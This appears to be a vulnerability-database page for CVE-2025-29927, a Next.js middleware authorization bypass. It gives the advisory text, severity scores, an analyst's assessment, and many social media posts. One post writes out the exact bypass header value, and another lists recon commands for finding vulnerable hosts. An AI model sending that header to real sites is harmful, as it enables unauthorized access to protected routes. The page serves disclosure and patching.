CVE-2025-29927

Published Mar 21, 2025

Last updated 9 months ago

CVSS critical 9.1
React
Next.js

Overview

AI description

Automated description summarized from trusted sources.

CVE-2025-29927 is an authorization bypass vulnerability affecting Next.js, a React framework. It stems from the improper handling of the `x-middleware-subrequest` header. By exploiting this vulnerability, attackers can bypass authorization checks implemented in Next.js middleware. This flaw allows attackers to skip running the middleware, potentially allowing requests to bypass critical checks like authorization cookie validation before reaching routes. Self-hosted Next.js applications using Middleware are affected, specifically those relying on it for authentication or security checks. The vulnerability is fixed in Next.js versions 14.2.25 and 15.2.3.

Description
Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
Source
security-advisories@github.com
NVD status
Analyzed
Products
next.js

Insights

Analysis from the Intruder Security Team
Published Mar 24, 2025 Updated Mar 24, 2025

This authentication bypass vulnerability in Next.js allows an attacker to bypass middleware validation steps such as checking the user is authorized to access a resource. The exploit is simple to use and could potentially be exploited en-masse, though some manual effort is likely to be required to identify routes that are not accessible without authentication.

The advisory states that deployments using next start and output: 'standalone' should be updated as a priority, and lists the affected versions.

Next.js is a full stack framework, and applications which are only using front-end elements of the framework will not be vulnerable. Additionally, popular WAFs like Cloudflare added detection rules for this exploit already, so there is also reduced risk for applications which are deployed behind a WAF with effective rules. However, WAFs should not be relied upon to protect against this weakness, as further research could reveal bypasses, or alternative routes to exploit the weakness.

Risk scores

CVSS 3.1

Type
Secondary
Base score
9.1
Impact score
5.2
Exploitability score
3.9
Vector string
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Severity
CRITICAL

Weaknesses

security-advisories@github.com
CWE-285
nvd@nist.gov
CWE-863

Social media

Hype score
Not currently trending

  1. A Next.js PR trusted `x-middleware-subrequest` from external clients, bypassing auth. CVE-2025-29927 (CVSS 9.1). Our analyzer caught it on the diff. 🔗 https://t.co/rahNsKsfRC

    @polsia

    12 Jun 2026

    42 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  2. Your Next.js middleware runs on every request. Or it's supposed to. CVE-2025-29927 let attackers skip it entirely — with a single HTTP header. No exploit code. No auth bypass tool. Just curl and one header. If middleware was your only auth layer, every protected route was ope

    @DataHogo

    18 May 2026

    269 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  3. Someone added one HTTP header to a request. The dashboard loaded. No login. No session. No credentials. Just: x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware That's CVE-2025-29927. It bypassed every Next.js middleware check in versions 11.1.4

    @DataHogo

    18 May 2026

    284 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  4. Why CVE-2026-44578 is not like CVE-2025-29927: 44578: the proxy feature runs — just to a forbidden target → #1 29927: middleware protection is skipped → #2 Same Next.js ecosystem. Buzzwords group them. TLCTC separates causes. https://t.co/XBSqMhGK1w #TLCTC #Cybersec

    @fr33thought

    15 May 2026

    32 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  5. I just completed Next.js: CVE-2025-29927 room on TryHackMe! Explore an authorisation bypass vulnerability in Next.js. https://t.co/uN3XW5fFa8 #tryhackme via @tryhackme #tryhackme #learning #Consistency

    @LittleSun4lower

    9 May 2026

    250 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  6. "PCP replaced" - the metric tracked by PCPJack's C2. PCPJack is a Linux credential-stealing worm disclosed May 7, 2026 by SentinelLabs. It exploits five CVEs to spread: - CVE-2025-29927 (Next.js middleware auth bypass) - CVE-2025-55182 "React2Shell" (Next.js Server Actions

    @SecureChap

    8 May 2026

    283 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  7. New PCPJack worm targets cloud infrastructure, stealing credentials from Docker/Kubernetes/Redis while actively removing TeamPCP infections. Exploits 5 recent CVEs including CVE-2025-29927 and CVE-2026-1357 for initial access. #DFIR_Radar https://t.co/4pMlgIN6MQ

    @DFIR_Radar

    7 May 2026

    341 Impressions

    0 Retweets

    2 Likes

    1 Bookmark

    1 Reply

    0 Quotes

  8. What started as bash scripts and scheduled scans evolved into full scale cloud-native execution with Nuclei Cloud. When the Next.js CVE-2025-29927 dropped, Elastic scanned 14,500 assets in under 5 minutes, something that previously took days. Read the full customer story here

    @pdiscoveryio

    30 Apr 2026

    1142 Impressions

    2 Retweets

    10 Likes

    4 Bookmarks

    0 Replies

    0 Quotes

  9. We just got hit with worst cybersecurity attack. Issue traced back to Opus committing "Good for now, not a big deal" on a well known vulnerability from last year "CVE-2025-29927" In order to fix an issue, Opus 4.6 chose to downgrade Nextjs to 15.0.3 which has sever known issue.

    @4n1rudh4

    15 Apr 2026

    103 Impressions

    0 Retweets

    2 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  10. [CYBERSEC] 𝗡𝗲𝘅𝘁.𝗷𝘀 𝗖𝗩𝗘-𝟮𝟬𝟮𝟱-𝟮𝟵𝟵𝟮𝟳 𝗔𝗹𝗹𝗼𝘄𝘀 𝗙𝘂𝗹𝗹 𝗔𝘂𝘁𝗵𝗲𝗻𝘁𝗶𝗰𝗮𝘁𝗶𝗼𝗻 𝗕𝘆𝗽𝗮𝘀𝘀 In March 2025, Vercel disclosed CVE-2025-29927, a critical flaw in

    @DarkForgeNews

    2 Apr 2026

    113 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  11. Researchers have uncovered a critical vulnerability (CVE-2025-29927) in Next.js middleware, allowing authorization bypass. Learn about the exploit and fixes. https://t.co/dUBFM8DcV0

    @pedri77

    26 Mar 2026

    133 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  12. 【Qiita】1年前にすごい人 [ Next.js CVE-2025-29927 ]に関する記事を書いた @suin さん : https://t.co/SxGcP0On3a

    @q_hayari

    25 Mar 2026

    223 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  13. A vibe-coded Next.js app got a cryptominer. Not from bad prompting. Not from a bad model. The AI pinned a vulnerable dependency. The app passed functional tests. Nobody asked "why this version?" Attacker found CVE-2025-29927. Middleware bypass. Mining binary. 100% CPU. AI

    @gremlinworks_

    17 Mar 2026

    101 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  14. 1/4: Next.js sitenizin kapısını açık mı bıraktınız? (CVE-2025-29927) 🚨 Tüm auth ve CSP katmanınızı tek bir header ile geçmek mümkün. Şu anki meta: **x-middleware-subrequest** suistimali. Nasıl çalıştığını ve korunma yollarını inceleyelim. 🧵 2/

    @logapsec

    10 Mar 2026

    153 Impressions

    0 Retweets

    1 Like

    1 Bookmark

    0 Replies

    0 Quotes

  15. I just completed Next.js: CVE-2025-29927 room on TryHackMe! Explore an authorisation bypass vulnerability in Next.js. https://t.co/UNic0BXic5 #tryhackme via @tryhackme

    @ToTo13ru_xakep

    9 Mar 2026

    38 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  16. 🚨 Nextjs Middleware Bypass Flaw (#CVE-2025-29927): A Deep Dive into the Vulnerability and How to Secure Your Apps + Video https://t.co/EkI4a9gG6E Educational Purposes!

    @UndercodeUpdate

    23 Feb 2026

    26 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  17. I just completed Next.js: CVE-2025-29927 room on TryHackMe! Explore an authorisation bypass vulnerability in Next.js. https://t.co/mHFw7nPj0s #tryhackme via @tryhackme

    @acupunc28094787

    22 Feb 2026

    43 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  18. 🚨 CVE-2026-1281 Critical Code Injection in Ivanti EPMM: What You Should Know 🚨 Discover the key information you need to know about CVE-2025-29927, an authentication bypass vulnerability in the middleware layer in Vercel’s Next.js. Learn more: https://t.co/FBnEhbfv8Y htt

    @pluralsight

    3 Feb 2026

    1136 Impressions

    0 Retweets

    0 Likes

    2 Bookmarks

    0 Replies

    0 Quotes

  19. 🚨 Next.js Middleware Auth Bypass (CVE-2025-29927 | CVSS 9.1) One trusted header. Skipped middleware. Full app compromise. Our research shows how a single request leads to auth bypass, LFI & server takeover. Full blog: https://t.co/s20LKcdmiF Connect - https://t.co/wRAYxGeO

    @consult_secnuo

    28 Jan 2026

    31 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  20. CVE-2025-29927: Next.js Middleware Bypass: When 'I'm With The Band' Actually Works https://t.co/YkiB6BgVG9 #security #cybersecurity #cve #ghsa

    @_cvereports

    12 Jan 2026

    12 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  21. Top 5 Trending CVEs: 1 - CVE-2025-43533 2 - CVE-2023-29218 3 - CVE-2026-20029 4 - CVE-2025-55182 5 - CVE-2025-29927 #cve #cvetrends #cveshield #cybersecurity https://t.co/4Fua3CAN6W

    @CVEShield

    11 Jan 2026

    75 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  22. HackTheBox - Previous ⚙️ Authorization Bypass en Next.js (CVE-2025-29927) 📂 Descarga de archivos via Path Traversal 🔑 Credenciales para SSH 🚀 Privesc con sudo y Terraform https://t.co/qmQvcGDXzd

    @sckull_

    10 Jan 2026

    54 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  23. Previous from @hackthebox_eu features CVE-2025-29927 (NextJS middleware auth bypass), directory traversal for file read, and three ways to abuse a Terraform sudo rule with !env_reset to get root. https://t.co/8wz1Fnbz38

    @0xdf_

    10 Jan 2026

    1974 Impressions

    5 Retweets

    32 Likes

    8 Bookmarks

    1 Reply

    0 Quotes

  24. Best of 2025: CVE-2025-29927 – Understanding the Next.js Middleware Vulnerability - Security Boulevard https://t.co/7C55OcSEEd

    @PVynckier

    4 Jan 2026

    116 Impressions

    1 Retweet

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  25. Day 79 of #100DaysOfCybersecurity🛡️ Next.js CVE-2025-29927 lab completed ✅ Analyzed an authorization bypass where a crafted HTTP header skips middleware checks and exposes protected routes ⚠️ Affects Next.js versions before 14.2.25 and 15.2.3. Patch now. https://t.

    @HezyChacha

    31 Dec 2025

    23 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  26. I just completed Next.js: CVE-2025-29927 room on TryHackMe. Explore an authorisation bypass vulnerability in Next.js. https://t.co/VQjqTYrVDA #tryhackme via @tryhackme

    @HezyChacha

    31 Dec 2025

    36 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  27. به تازگی گروه هکری با نام PCPcat از دو آسیب پذیری با کد های شناسایی CVE-2025-29927 و CVE-2025-66478 برای نفوذ به سرورها استفاده می کنند. یکی از این آسیب پذیری ها مربوط به آسی

    @AmirHossein_sec

    25 Dec 2025

    57 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  28. Operation PCPcat Hacked 59,000+ Next.js/React Servers Within 48 Hours A massive credential-theft campaign dubbed PCPcat compromised 59,128 Next.js servers in under 48 hours. The operation exploits critical vulnerabilities CVE-2025-29927 and CVE-2025-66478, achieving a 64.6%

    @redhuvivek09

    25 Dec 2025

    161 Impressions

    0 Retweets

    3 Likes

    0 Bookmarks

    1 Reply

    0 Quotes

  29. 🚨 Operation PCPcat: Credential-Stealing Campaign Hijacks 59,000+ Next.js Servers via React/Next.js RCE A mass exploitation campaign is compromising internet-facing Next.js deployments by chaining CVE-2025-29927 and CVE-2025-66478 for RCE, then scraping high-value secrets (.env

    @ThreatSynop

    25 Dec 2025

    3 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  30. 🚨 Operation PCPcat Hacked 59,000+ Next.js/React Servers Within 48 Hours Source: https://t.co/O09ua70IX0 A massive credential-theft campaign dubbed PCPcat compromised 59,128 Next.js servers in under 48 hours. The operation exploits critical vulnerabilities CVE-2025-29927 and

    @The_Cyber_News

    24 Dec 2025

    4808 Impressions

    34 Retweets

    95 Likes

    28 Bookmarks

    3 Replies

    1 Quote

  31. 59,128台のNext.jsサーバが48時間でハッキングされた。Beelzebub社報告。CVE-2025-29927とCVE-2025-66478の連鎖。攻撃成功率は64.6%。C2サーバ偵察による調査。活動をOperation PCPcatと命名。 https://t.co/FIwX4EOrYX

    @__kokumoto

    24 Dec 2025

    3471 Impressions

    14 Retweets

    46 Likes

    16 Bookmarks

    0 Replies

    1 Quote

  32. PCPcat malware compromises 59,000+ servers in under 48 hours via React2Shell exploit, abusing .js/React RCE flaws CVE-2025-29927 and CVE-2025-66478 for unauthenticated remote code execution. #Malware https://t.co/3iSPlAiBTl

    @threatcluster

    15 Dec 2025

    33 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  33. I just completed Next.js: CVE-2025-29927 room on TryHackMe. Explore an authorisation bypass vulnerability in Next.js. https://t.co/FxrOM7K1yV #tryhackme via @tryhackme

    @mXgarweg

    13 Dec 2025

    35 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  34. ⚠️ SCASH Wallet 安全通报 & 服务状态更新 经过紧急维护,我们的网页钱包现已恢复正常。 区块链浏览器将会在24小时内恢复。 这次问题源自 Next.js 的一个已公开漏洞(CVE-2025-29927)。该漏洞允许攻击者通过构

    @Hysanalde

    8 Dec 2025

    1267 Impressions

    7 Retweets

    23 Likes

    2 Bookmarks

    5 Replies

    0 Quotes

  35. 🚨 Even popular frameworks like Next.js can have serious flaws… Just completed the Next.js: CVE-2025-29927 room on @TryHackMe 🧠💻 Dug into an authorization bypass vulnerability and how attackers can exploit weak access control. 🔗 https://t.co/7npcdvpCc5 #TryHackMe

    @BlackLightning5

    24 Nov 2025

    10 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  36. CVE-2025-29927 https://t.co/fmtDlTNkXc

    @ExWareLabs

    19 Nov 2025

    46 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  37. Want to learn a way to find those hard-hitting critical vulnerabilities? 🐛 CVE-2025-29927 is a vulnerability in Next.JS that can lead to a complete authorization bypass. Watch the video below to get a quick peek and then try the lab yourself 👇 https://t.co/zC6GAAqOB0… h

    @Kimcheater_

    16 Nov 2025

    41 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  38. Next.jsのMiddlewareで認証している方はすぐに確認を!認可バイパス脆弱性(CVE-2025-29927)の解説と対策 https://t.co/IrxQiIPHiR #Qiita

    @keigoriankami

    10 Nov 2025

    18 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  39. CVE-2025-29927 - #Next.js Auth Bypass PoC https://t.co/AJsKE1EMUA #hacking

    @hack4lifemx

    6 Nov 2025

    101 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  40. Want to learn a way to find those hard-hitting critical vulnerabilities? 🐛 CVE-2025-29927 is a vulnerability in Next.JS that can lead to a complete authorization bypass. Watch the video below to get a quick peek and then try the lab yourself 👇 https://t.co/U8HN812Oey http

    @hackinghub_io

    5 Nov 2025

    6422 Impressions

    23 Retweets

    122 Likes

    91 Bookmarks

    1 Reply

    0 Quotes

  41. Post 1/30 : CVE-2025-29927 How to find Vulnerable Assets for it! Steps; 1. Get all domains and IPS Domains >> Subfinder -dL list-of-domain.txt -o subdomains.txt IPs >> shodan search "ssl:'domain.tld'" --fields ip_str --limit 1000 >> ips.txt 2. find their op

    @h4x0r_fr34k

    19 Oct 2025

    11773 Impressions

    31 Retweets

    249 Likes

    272 Bookmarks

    1 Reply

    1 Quote

  42. Day 1/30 : CVE-2025-29927 How to find Vulnerable Assets for it! Steps; 1. Get all domains and IPS Domains >> Subfinder -dL list-of-domain.txt -o subdomains.txt IPs >> shodan search "ssl:'domain.tld'" --fields ip_str --limit 1000 >> ips.txt 2. find their ope

    @h4x0r_fr34k

    19 Oct 2025

    31 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  43. I was awarded a $290 bounty on @Hacker0x01! https://t.co/5dbKBrWp1S #TogetherWeHitHarder #bugbountytips Tip: CVE-2025-29927 via /admin https://t.co/sERtc8B1ks

    @exploit_msf

    4 Oct 2025

    3254 Impressions

    2 Retweets

    127 Likes

    15 Bookmarks

    2 Replies

    0 Quotes

  44. 🚨 ¡Nuevo vídeo disponible! Explotando el CVE-2025-29927 en un middleware vulnerable 💥 Desde la detección hasta la PoC funcional. ✅ Identificar versión vulnerable ✅ Conectar Burp y analizar 🎯 Pensamiento ofensivo aplicado. No teoría. 📺 https://t.co/Noy9UEmX

    @gorkaelbochi

    20 Sept 2025

    74 Impressions

    0 Retweets

    0 Likes

    1 Bookmark

    0 Replies

    0 Quotes

  45. 🚨CVE-2025-29927: Next.js Middleware Bypass Vulnerability PoC: https://t.co/olD5JesWY1 Credit: https://t.co/3XCm1VLLsI https://t.co/nIJFC7hjf4

    @DarkWebInformer

    17 Sept 2025

    7723 Impressions

    19 Retweets

    97 Likes

    52 Bookmarks

    0 Replies

    1 Quote

  46. 🚨 ¡Nuevo vídeo ya disponible! 📽️ Explotando el CVE-2025-29927 paso a paso 🧠 Middleware vulnerable → PoC funcional → ejecución real ✅ Detectar versión vulnerable ✅ Analizar el flujo ✅ Construir PoC ✅ Explotación práctica 📺 https://t.co/Noy9UEmXIo

    @gorkaelbochi

    16 Sept 2025

    81 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  47. 💡 ⚒️ ✏️  Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927) https://t.co/cDC5TeXhMw

    @pedri77

    15 Sept 2025

    46 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  48. 🚨 Este martes 16 a las 20:00 subo vídeo: Explotación paso a paso del CVE-2025-29927 🧠 ¿El objetivo? Un middleware vulnerable. Verás: ✅ Qué es middleware ✅ Cómo detectar la versión vulnerable ✅ Cómo explotarlo (real) 💥 Sin teoría. Todo práctico. 💞 ht

    @gorkaelbochi

    15 Sept 2025

    52 Impressions

    0 Retweets

    0 Likes

    0 Bookmarks

    0 Replies

    0 Quotes

  49. I just completed Next.js: CVE-2025-29927 room on TryHackMe. Explore an authorisation bypass vulnerability in Next.js. https://t.co/3sLnz8REQ3 #tryhackme via @realtryhackme

    @vinnykosgeii

    13 Sept 2025

    62 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

  50. 🚨 Next.js CVE-2025-29927 – Authentication Bypass Explained 🔎 What Happened? A critical vulnerability in Next.js middleware (CVE-2025-29927, CVSS 9.1) allows attackers to bypass authentication and authorization checks. The root cause: improper trust of an internal header

    @AnonOzzyDude

    8 Sept 2025

    55 Impressions

    0 Retweets

    1 Like

    0 Bookmarks

    0 Replies

    0 Quotes

Configurations

Related CVEs

  1. Next.js is a React framework for building full-stack web applications. From 15.2.0 to before 15.5.18 and 16.2.6, it was found that the fix addressing CVE-2026-44575 did not apply to middleware.ts with Turbopack. This vulnerability is fixed in 15.5.18 and 16.2.6.CVE-2026-45109
  2. Next.js is a React framework for building full-stack web applications. From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can be vulnerable to cache poisoning in deployments that rely on shared caches with insufficient response partitioning. In affected conditions, collisions in the _rsc cache-busting value can allow an attacker to poison cache entries so users receive the wrong response variant for a given URL. This vulnerability is fixed in 15.5.16 and 16.2.5.CVE-2026-44582
  3. Next.js is a React framework for building full-stack web applications. From to before 15.5.16 and 16.2.5, applications using Partial Prerendering through the Cache Components feature can be vulnerable to connection exhaustion through crafted POST requests to a server action. In affected configurations, a malicious request can trigger a request-body handling deadlock that leaves connections open for an extended period, consuming file descriptors and server capacity until legitimate users are denied service. This vulnerability is fixed in 15.5.16 and 16.2.5.CVE-2026-44579
  4. Next.js is a React framework for building full-stack web applications. From 13.4.0 to before 15.5.16 and 16.2.5, App Router applications that rely on CSP nonces can be vulnerable to stored cross-site scripting when deployed behind shared caches. In affected versions, malformed nonce values derived from request headers could be reflected into rendered HTML in an unsafe way, allowing an attacker to poison cached responses and cause script execution for later visitors. This vulnerability is fixed in 15.5.16 and 16.2.5.CVE-2026-44581
  5. Next.js is a React framework for building full-stack web applications. From 13.0.0 to before 15.5.16 and 16.2.5, applications that use beforeInteractive scripts together with untrusted content can be vulnerable to cross-site scripting. In affected versions, serialized script content was not escaped safely before being embedded into the document, which could allow attacker-controlled input to break out of the intended script context and execute arbitrary JavaScript in a visitor's browser. This vulnerability is fixed in 15.5.16 and 16.2.5.CVE-2026-44580

References

Sources include official advisories and independent security research.